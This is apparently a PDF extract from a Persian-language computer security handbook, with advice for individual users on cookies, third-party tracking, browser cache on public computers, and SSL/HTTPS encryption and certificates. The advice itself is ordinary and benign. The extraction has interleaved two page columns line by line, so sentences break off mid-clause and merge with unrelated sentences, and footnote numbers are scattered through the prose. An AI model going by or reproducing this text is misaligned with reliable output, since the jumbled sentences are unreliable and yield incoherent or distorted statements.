‫ﻣﻲﺑﺎﺷﻨﺪ‪ .‬ﻋﻤﻮﻣﹰﺎ ﺍﻳﻦ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺩﺭﺻﻮﺭﺕ ﻏﻴﺮﻓﻌﺎﻝ ﺑﻮﺩﻥ‬
‫ﻗﺎﻧﻮﻥ ﺳﻴﺰﺩﻫﻢ‬
‫‪cookie‬ﻫﺎ ﺑﻪ ﺷﻤﺎ ﺍﻃﻼﻉ ﻣﻲﺩﻫﻨـﺪ ﻛـﻪ ﻗـﺎﺩﺭ ﺑـﻪ ﺍﻧﺠـﺎﻡ ﻳـﺎ‬
‫ﭼﮕﻮﻧﮕﻲ ﻭﺿﻌﻴﺖ ﺫﺧﻴﺮﺓ ‪cookie‬ﻫﺎ ﺑﺮ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﻪ‬
‫ﺗﻜﻤﻴﻞ ﻋﻤﻠﻴﺎﺕ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﺍﮔﺮ ﻧﻤﻲ ﺗﻮﺍﻧﻴـﺪ ﺁﻧﻬـﺎ ﺭﺍ‬
‫ﺍﮔﺮ ﺩﺭ ﺍﻣﺎﻛﻦ ﻋﻤـﻮﻣﻲ )ﻣﺜـﻞ ﻛـﺎﻓﻲﻧـﺖ‪ ،‬ﻛﺘﺎﺑﺨﺎﻧـﻪﻫـﺎ‪ ،‬ﻣـﺪﺍﺭﺱ( ﺍﺯ‬ ‫ﻛﻨﺘﺮﻝ ﻧﻤﺎﻳﻴﺪ )ﻣﺎﻧﻨﺪ ﺯﻣﺎﻧﻴﻜـﻪ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺭ ﻳـﻚ ﻣﻜـﺎﻥ‬
‫ﻣﺮﻭﺭﮔﺮﻫــﺎﻱ ﻭﺏ ﺍﺳــﺘﻔﺎﺩﻩ ﻣــﻲﻛﻨﻴــﺪ ﺗﻮﺟــﻪ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻴﺪ‬ ‫ﻋﻤﻮﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴـﺪ( ﺍﻃﻼﻋﺎﺕ ﺧـﺼﻮﺻﻲ ﺧـﻮﺩ ﺭﺍ‬
‫‪cookie‬ﻫﺎﻳﻲ ﻛﻪ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﻫﺴﺘﻨﺪ ﺩﺭ ﺁﻧﻬﺎ ﺫﺧﻴـﺮﻩ‬
‫ﻭﺍﺭﺩ ﺭﺍﻳﺎﻧﻪ ﻧﻜﻨﻴﺪ‪.‬‬
‫ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺭﺍﻫﺒﺮ ﺭﺍﻳﺎﻧﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺷﻤﺎ‬
‫ﺁﻧﻘﺪﺭ ﺩﺳﺘﺮﺳﻲ ﻧﺪﺍﺩﻩ ﺑﺎﺷﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻴـﺪ ‪cookie‬ﻫـﺎ ﺭﺍ ﻛﻨﺘـﺮﻝ‪،‬‬ ‫ﻛﻠﻴﺔ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻭﺏ ﺗﺎ ﺳﻄﺢ ﻛﻨﺘﺮﻝ ﺧﺎﺻﻲ ﺑﻪ ﺷـﻤﺎ ﺍﻣﻜـﺎﻥ‬
‫ﻧﻈﺎﺭﻩ ﻭ ﻳﺎ ﭘﺎﻙ ﻛﻨﻴﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﺷـﻤﺎ ﺩﺭ ﺍﻳـﻦ ﺭﺍﻳﺎﻧـﻪ‬ ‫ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﻭﺟﻮﺩ ‪cookie‬ﻫﺎ ﺭﺍ ﻣﺠﺎﺯ ﺑﺪﺍﻧﻴﺪ ﻳﺎ ﺧﻴﺮ‪ .‬ﺩﺭ ﺑﺮﺧﻲ‬
‫ﻣﻲﻣﺎﻧﺪ ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻮﺳﻴﻠﺔ ﻓﺮﺩ ﺩﻳﮕﺮﻱ ﻛـﻪ ﻫﻤـﺎﻥ ﭘﺎﻳﮕـﺎﻩ‬ ‫ﻣﻮﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺮﻭﺭﮔﺮ ﻣﻴﺎﻥ ‪cookie‬ﻫﺎﻳﻲ ﻛـﻪ ﺩﺭ ﺭﺍﻳﺎﻧـﺔ‬
‫ﻭﺏ ﺭﺍ ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ .‬ﺍﮔﺮ ﺑﻪ ﭘﺎﻳﮕـﺎﻩ‬ ‫ﺷﻤﺎ ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﺍﻧﺪ‪cookie ،‬ﻫﺎﻳﻲ ﻛﻪ ﻫﻨﮕﺎﻡ ﺑـﺴﺘﻦ ﻣﺮﻭﺭﮔـﺮ‬
‫ﻭﺑﻲ ﻭﺍﺭﺩ ﺷﺪﻩ ﺑﺎﺷﻴﺪ ﻭ ﺍﻃﻼﻋﺎﺕ ﻣﻌﺘﺒﺮ ﺷﻤﺎ ﺩﺭ ﻳـﻚ ‪cookie‬‬ ‫ﻧﺎﭘﺪﻳﺪ ﻣﻲﺷﻮﻧﺪ ﻭ ﺁﻧﺪﺳﺘﻪ ﻛﻪ ﻫﻨﮕﺎﻡ ﻣﺸﺎﻫﺪﺓ ﭘﺎﻳﮕﺎﻩﻫﺎﻱ ﻭﺏ ﻭ‬
‫ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﺑﺎﺷﺪ ﻭ ﻛﺎﺭﺑﺮ ﺩﻳﮕﺮﻱ ﺑﻪ ﻫﻤﺎﻥ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺮﺍﺟﻌـﻪ‬
‫‪83‬‬ ‫‪Session‬‬
‫ﻧﻤﺎﻳﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺑﺠﺎﻱ ﺷﻤﺎ ﻭﺍﺭﺩ ﺁﻥ ﭘﺎﻳﮕﺎﻩ‬ ‫‪84‬‬ ‫‪Foreign Site‬‬
‫‪85‬‬ ‫‪Third-Party Site‬‬
‫ﮔــﺮﺩﺩ‪ .‬ﺩﺭﻧﺘﻴﺠــﻪ ﺍﺣﺘﻤــﺎﻝ ﺩﺍﺭﺩ ﻛــﻪ ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ﺍﻃﻼﻋــﺎﺕ‬ ‫ﻓﺮﺽ ﻛﻨﻴﺪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ‪ A‬ﻭ ‪ B‬ﻭ ‪ C‬ﻭ ‪ D‬ﻫﻤﮕﻲ ﻳﻚ ﺗﺼﻮﻳﺮ ﻧﺎﻣﺮﺋﻲ‬ ‫‪۸۶‬‬
‫ﺫﺧﻴﺮﻩﺷﺪﺓ ﺷﻤﺎ )ﻣﺎﻧﻨﺪ ﻧﺎﻡ‪ ،‬ﺁﺩﺭﺱ ﻭ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ( ﺭﺍ ﺩﺭ‬ ‫ﺍﺯ ﭘﺎﻳﮕﺎﻩ ‪ Z‬ﻧﻤﺎﻳﺶ ﻣﻲﺩﻫﻨﺪ‪ .‬ﻭﻗﺘﻲ ﺗﺼﻮﻳﺮ ﻣﺮﺑﻮﻃﻪ ﺩﺭ ﻣﺮﻭﺭﮔﺮ ﺷﻤﺎ ﺑﻪ‬
‫ﺍﺧﺘﻴﺎﺭ ﺍﻳﻦ ﻛﺎﺭﺑﺮ ﻗﺮﺍﺭ ﺩﻫﺪ‪.‬‬ ‫ﻧﻤﺎﻳﺶ ﺩﺭ ﻣﻲﺁﻳﺪ‪ Z ،‬ﻣﻄﻠﻊ ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﺯ ﻛﺪﺍﻡ ﭘﺎﻳﮕﺎﻩ ﺑـﻪ ﺁﻥ ﺍﺷـﺎﺭﻩ‬
‫ﺷﺪﻩ ﺍﺳﺖ‪ ،‬ﻭ ﺳﭙﺲ ‪cookie‬ﻫﺎﻳﻲ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ ﺗﺎ ﺑﻪ ﺧﺎﻃﺮ ﺑﺴﭙﺎﺭﺩ‬
‫ﺍﻳﻦ ﻣﻮﺭﺩ ﺣﺘﻲ ﺩﺭ ﻳﻚ ﺭﺍﻳﺎﻧـﺔ ﺧـﺼﻮﺻﻲ ﻛـﻪ ﭼﻨـﺪ ﻧﻔـﺮ ﺍﺯ ﺁﻥ‬ ‫ﻛﻪ ﺷﻤﺎ ﺍﺯ ﻛﺪﺍﻡ ﭘﺎﻳﮕﺎﻫﻬﺎ ﺩﻳﺪﻥ ﻛﺮﺩﻩ ﺑﻮﺩﻳﺪ‪ .‬ﺍﺯ ﺍﻳﻦ ﭘـﺲ ‪ Z‬ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﺍﻳﻨﻜﻪ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﻣﻮﺭﺩ ﻋﻼﻗﺔ ﺷﻤﺎ ﺍﺳﺖ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺑﻲ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺸﻜﻞﺳﺎﺯ ﺷـﻮﺩ‪ .‬ﺩﺭ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ‬
‫ﺩﺍﺭﺩ ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﺍﺭﺳﺎﻝ ﺗﺒﻠﻴﻐﺎﺕ ﺑﻪ ﺷﻤﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﻨﺪ‪.‬‬
‫‪٨٧‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﻣﺮﻭﺭﮔﺮﻱ ﺩﺭ ﻧﻮﺍﺭ ﺍﺑﺰﺍﺭ ﺧﻮﺩ ﻧﻤﺎﻳﻪﺍﻱ ﻗﺮﺍﺭ ﻧﺪﺍﺩﻩ ﻛﻪ ﺑﺎ ﻛﻠﻴﻚ ﺑﺮ‬ ‫‪cookie‬ﻫﺎ ﻧﻪ ﺗﻨﻬﺎ ﻳﻚ ﻣﺸﻜﻞ ﺑﺮﺍﻱ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻫﺴﺘﻨﺪ‪،‬‬
‫ﺭﻭﻱ ﺁﻥ ﺑﺘﻮﺍﻥ ﺑﻪ ﺁﺳﺎﻧﻲ ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ ﺭﺍ ﭘﺎﻙ ﻧﻤﻮﺩ‪.‬‬ ‫ﺑﻠﻜﻪ ﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﺑﺸﻤﺎﺭ ﻣﻲﺭﻭﻧﺪ‪.‬‬

‫ﺍﻧﺘﻘﺎﻝ ﺍﻣﻦ‬ ‫ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ‪ ٨٧‬ﻣﺮﻭﺭﮔﺮ ﻭﺏ‬


‫ﻛﻠﻴﺔ ﭘﻴﺎﻣﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﻭﺏ ﺩﺭﻳﺎﻓﺖ ﻭ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻴـﺪ ﺑـﺼﻮﺭﺕ‬ ‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﻣﺮﻭﺭﮔﺮ ﺻﻔﺤﻪ ﻳﺎ ﺗـﺼﻮﻳﺮﻱ ﺭﺍ ﺍﺯ ﻳـﻚ ﭘﺎﻳﮕـﺎﻩ‬
‫ﻣﺘﻦﺳﺎﺩﻩ ﻫﺴﺘﻨﺪ‪ .‬ﺍﻳﻦ ﺑﺪﺍﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﺍﮔﺮ ﻓﺮﺩﻱ ﺑﺘﻮﺍﻧﺪ ﺍﻳـﻦ‬ ‫ﻻ ﻳـﻚ ﻧـﺴﺨﻪ ﺍﺯ ﺻـﻔﺤﺔ ﺩﺭﺣـﺎﻝ‬ ‫ﻭﺏ ﺑﺎﺯﻳﺎﺑﻲ ﻣﻲﻛﻨـﺪ ﻣﻌﻤـﻮ ﹰ‬
‫ﻣﺘﻨﻬﺎ ﺭﺍ ﻣﻴـﺎﻥ ﺭﺍﻩ ﺭﺍ ﺑـﺪﺯﺩ‪ ،‬ﺑـﺮﺍﻱ ﻭﻱ ﻗﺎﺑـﻞ ﻓﻬـﻢ ﻭ ﺧﻮﺍﻧـﺪﻥ‬ ‫ﻧﻤﺎﻳﺶ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺩﻳﺴﻚ ﺳﺨﺖ ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩ ﻣـﻲﻧﻤﺎﻳـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ‪ .‬ﺍﮔﺮ ﺑﺨﺸﻲ ﺍﺯ ﺍﺭﺗﺒﺎﻁ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﻪ ﺷـﻜﻞ ﺑـﻲﺳـﻴﻢ‬ ‫ﻣﺠﻤﻮﻋﺔ ﺻﻔﺤﺎﺕ ﻭ ﺗﺼﺎﻭﻳﺮ ﺫﺧﻴﺮﻩﺷﺪﻩ "ﺣﺎﻓﻈﺔ ﻧﻬـﺎﻥ" ﻧﺎﻣﻴـﺪﻩ‬
‫ﺑﺎﺷﺪ ﻭ ﻳﺎ ‪ ISP‬ﺍﻧﺘﻬﺎﻱ ﺍﺭﺗﺒﺎﻁ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻧﺒﺎﺷﺪ ﺩﺯﺩﻱ ﭘﻴـﺎﻡ‬ ‫ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﮔﺮ ﺍﻳﻦ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ ﻭ ﺻﻔﺤﺔ‬
‫ﺍﺯ ﻣﻴﺎﻥ ﺭﺍﻩ ﺭﺍﺣﺖﺗﺮ ﻣﻲﺷﻮﺩ ﻭ ﻟﺬﺍ ﺗﻮﺟﻪ ﺑـﻪ ﺁﻥ ﺍﻫﻤﻴـﺖ ﺑـﺴﻴﺎﺭ‬ ‫ﺁﻥ ﺗﻐﻴﻴﺮ ﻧﻜﺮﺩﻩ ﺑﺎﺷﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺮﻭﺭﮔـﺮ ﻛـﻞ ﺻـﻔﺤﻪ ﺭﺍ ﺍﺯ‬
‫ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ‪.‬‬ ‫ﺍﺑﺘﺪﺍ ‪ download‬ﻧﻜﻨﺪ‪ ،‬ﺑﻠﻜﻪ ﺑﺮﺍﻱ ﻧﻤﺎﻳﺶ ﺁﻥ ﺍﺯ ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ‬
‫ﻣﺮﻭﺭﮔﺮﻫﺎ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﺑﺮﺍﻱ ﺣﻞ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺍﺯ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﺪ‪ .‬ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﺻـﻔﺤﺎﺕ ﻭﺑـﻲ ﻛـﻪ ﺩﺭ ﺣﺎﻓﻈـﺔ‬
‫ﻧﻬﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺑﺼﻮﺭﺕ ‪) offline‬ﻳﻌﻨﻲ ﺑﺪﻭﻥ ﺍﺗـﺼﺎﻝ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻬﺮﻩ ﻣﻲﺑﺮﻧﺪ‪ .‬ﺭﻣﺰﮔـﺬﺍﺭﻱ ﭘﻴـﺎﻡ ﺭﺍ ﺗﻐﻴﻴـﺮ ﻣـﻲﺩﻫـﺪ؛‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ( ﻧﻴﺰ ﺩﻳﺪﻩ ﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﺑﺪﺍﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﻫﺮﺁﻧﭽﻪ ﺗﻮﺳـﻂ‬
‫ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﻏﻴﺮﻣﺠﺎﺯ ﺑﺴﻴﺎﺭ ﺳﺨﺖ ﻭ ﺣﺘـﻲ ﻏﻴـﺮﻣﻤﻜﻦ‬
‫ﻣﺮﻭﺭﮔﺮ ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﻴﺪ ﺩﺭ ﺩﻳﺴﻚ ﺳﺨﺖ ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩ ﺷـﺪﻩ‬
‫ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﭘﻴﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﺨﻮﺍﻧﻨﺪ )ﺑﺮﺍﻱ ﺟﺰﺋﻴـﺎﺕ‬
‫ﺍﺳﺖ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﮔﺮ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻣﻌﺎﻣﻼﺕ ﻣـﺎﻟﻲ ﺍﺯ ﻭﺏ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﺑﻴــﺸﺘﺮ ﺿــﻤﻴﻤﺔ ‪ ۱‬ﻫﻤــﻴﻦ ﺑﺨــﺶ ﺭﺍ ﻣﻄﺎﻟﻌــﻪ ﻧﻤﺎﻳﻴــﺪ(‪ .‬ﻧــﺎﻡ ﭘﺮﻭﺗﻜــﻞ‬
‫ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳﺪ‪ ،‬ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ﻭ ﺣﺴﺎﺑﻬﺎﻱ ﺑﺎﻧﻜﻲ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ "‪ ٨٩"SSL‬ﺍﺳـﺖ‪ .‬ﻣـﻲ ﺗﻮﺍﻧﻴـﺪ ﺑـﺮﺍﻱ ﭘﻴﺎﻣﻬـﺎﻳﻲ ﻛـﻪ‬
‫ﻼ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﻭ ﺑﺎﺯﻳـﺎﺑﻲ ﺧﻮﺍﻫﻨـﺪ ﺷـﺪ‪.‬‬ ‫ﺷﻤﺎ ﺩﺭ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﻛﺎﻣ ﹰ‬
‫ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ ﺍﺯ ‪ SSL‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﺩﺭ ﺍﻛﺜـﺮ ﻣﺮﻭﺭﮔﺮﻫـﺎ‬
‫ﺑﺎﺗﻮﺟﻪ ﺑﻪ ﻣﻴﺰﺍﻥ ﻣﺮﻭﺭ ﻭ ﺍﻧﺪﺍﺯﺓ ﺣﺎﻓﻈﺔ ﻧﻬـﺎﻥ‪ ،‬ﺍﻳـﻦ ﺻـﻔﺤﺎﺕ ﻭ‬
‫ﺗﺼﻮﻳﺮ ﻛﻮﭼﻜﻲ ﺍﺯ ﻳﻚ ﻗﻔﻞ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﻋـﺎﺩﻱ‬
‫ﭘﻴﺎﻡ ﺑﺎﺯ ﺍﺳﺖ ﻭ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻻﺗﻲ ﺍﺯ ﻧﻮﻉ ‪ SSL‬ﺑﻪ ﺣﺎﻟﺖ ﺑﺴﺘﻪ ﺩﺭ‬ ‫ﺗﺼﺎﻭﻳﺮ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﺎ ﻣﺪﺗﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﺑﺎﻗﻲ ﺑﻤﺎﻧﻨﺪ‪.‬‬
‫ﻣــﻲﺁﻳــﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺤﺎﻟــﺖ ‪ URL‬ﺁﻥ ﺻــﻔﺤﻪ ﺑﺠــﺎﻱ "‪ "http‬ﺑــﺎ‬
‫ﻗﺎﻧﻮﻥ ﭼﻬﺎﺭﺩﻫﻢ‪:‬‬
‫"‪ "https‬ﺁﻏﺎﺯ ﻣﻲﺷـﻮﺩ‪ .‬ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺩﺭ ﻛـﺸﻮﺭﺗﺎﻥ ﺍﻣﻜـﺎﻥ ﺁﻥ‬
‫ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﺷﻤﺎ ﺩﺭ ﺻﻔﺤﺔ ﻭﺏ‬
‫ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ‪ ،‬ﺑﻬﺘـﺮ ﺍﺳـﺖ ﻫﻤـﻮﺍﺭﻩ ﺍﺯ ﻗـﻮﻱﺗـﺮﻳﻦ ﺭﻭﺵ‬
‫ﻧﻤﺎﻳﺶ ﺩﺍﺩﻩ ﺷﺪ‪ ،‬ﭘﺲ ﺍﺯ ﺍﺗﻤﺎﻡ ﻛـﺎﺭ ﺑﺎﻳـﺪ ﺣﺎﻓﻈـﺔ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻧﻬﺎﻥ ﺭﺍ ﭘﺎﻙ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﮔﺮ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠـﺎﻡ‬
‫ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﻳﻦ ﻗﻔﻞ ﻣﺸﺨﺺ ﻧﻤﻲﻛﻨﺪ ﭘﻴﺎﻣﻲ ﻛﻪ ﺍﺯ‬ ‫ﺩﻫﻴﺪ )ﻣﺜ ﹰﻼ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﻋﻤﻮﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ(‬
‫ﻃﺮﻑ ﺷﻤﺎ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﺩ ﺑـﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ‬
‫ﻧﺒﺎﻳﺪ ﺍﺯ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﺑﺮﺍﻱ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﻣﺤﺮﻣﺎﻧـﺔ‬
‫ﺍﺯ ‪ SSL‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺍﺳﺖ ﻳﺎ ﻧﻪ‪ ،‬ﺍﻣﺎ ﻓﺮﺽ ﺑﺮ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ‬
‫ﺷﺨﺼﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺍﮔﺮ ﺻﻔﺤﺔ ﺍﺭﺳﺎﻟﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﭘﻴـﺎﻡ ﺑﺎﺯﮔـﺸﺘﻲ ﻧﻴـﺰ‬
‫ﺑﺼﻮﺭﺕ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﺩ‪.‬‬ ‫ﻛﻠﻴﺔ ﻣﺮﻭﺭﮔﺮﻫﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ )ﻛﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﻣـﻮﻗﺘﻲ‬
‫ﺍﻳﻨﺘﺮﻧـﺖ‪ ٨٨‬ﻧﺎﻣﻴـﺪﻩ ﻣـﻲﺷـﻮﺩ( ﺭﺍ ﺍﺯ ﺭﻭﻱ ﺳﻴـﺴﺘﻢ ﭘـﺎﻙ ﻛﻨﻴـﺪ؛ ﺍﻣـﺎ‬
‫‪ SSL‬ﺗﻨﻬﺎ ﺯﻣﺎﻧﻲ ﻛﺎﺭ ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﺮﻭﺭﮔـﺮ ﺑﺪﺍﻧـﺪ ﻣﺨﺎﻃـﺐ ﺁﻥ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﻣﺎﻛﻦ ﻋﻤﻮﻣﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﻛﻴــﺴﺖ‪ .‬ﺍﻳــﻦ ﺍﻣــﺮ ﺑــﻪ ﻛﻤــﻚ ﮔــﻮﺍﻫﻲ ﺍﻣﻨﻴﺘــﻲ‪ ٩٠‬ﻭ ﺍﻣــﻀﺎﻱ‬
‫ﻣﻲﮔﻴﺮﻧﺪ ﺍﺟﺎﺯﺓ ﻛﻨﺘﺮﻝ ﻭ ﺣـﺬﻑ ﺣﺎﻓﻈـﺔ ﻧﻬـﺎﻥ ﺭﺍ ﻧﻤـﻲﺩﻫﻨـﺪ‪.‬‬
‫ﺩﻳﺠﻴﺘﺎﻟﻲ‪ ٩١‬ﺻﻮﺭﺕ ﻣﻲﭘﺬﻳﺮﺩ‪ .‬ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﮔـﺮ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ‬
‫ﺍﮔﺮﭼﻪ ﭘﺎﻙ ﻛﺮﺩﻥ ﺍﻳﻦ ﺣﺎﻓﻈﻪ ﭘﺲ ﺍﺯ ﻭﺭﻭﺩ ﺍﻃﻼﻋﺎﺕ ﺣـﺴﺎﺱ‬
‫ﻭﺏ ﺑﺨﻮﺍﻫﺪ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﺑﺎﺷﺪ ﺑﺎﻳﺪ ﺍﺯ ﻳﻚ ﻣﺮﻛﺰ ﻣﻌﺘﺒﺮ ﺻﺪﻭﺭ‬
‫ﺍﺯ ﺍﻫﻤﻴﺖ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺗـﺎ ﺑـﻪ ﺣـﺎﻝ ﻫـﻴﭻ‬
‫ﮔﻮﺍﻫﻲ‪ ،‬ﮔﻮﺍﻫﻲ ﺍﻣﻨﻴﺘﻲ ﺗﻬﻴﻪ ﻧﻤﺎﻳـﺪ‪ .‬ﺍﮔـﺮ ﺍﻳـﻦ ﻣﺮﻛـﺰ ﺑﺨﻮﺍﻫـﺪ‬

‫‪89‬‬ ‫‪Secure Socket Layer‬‬


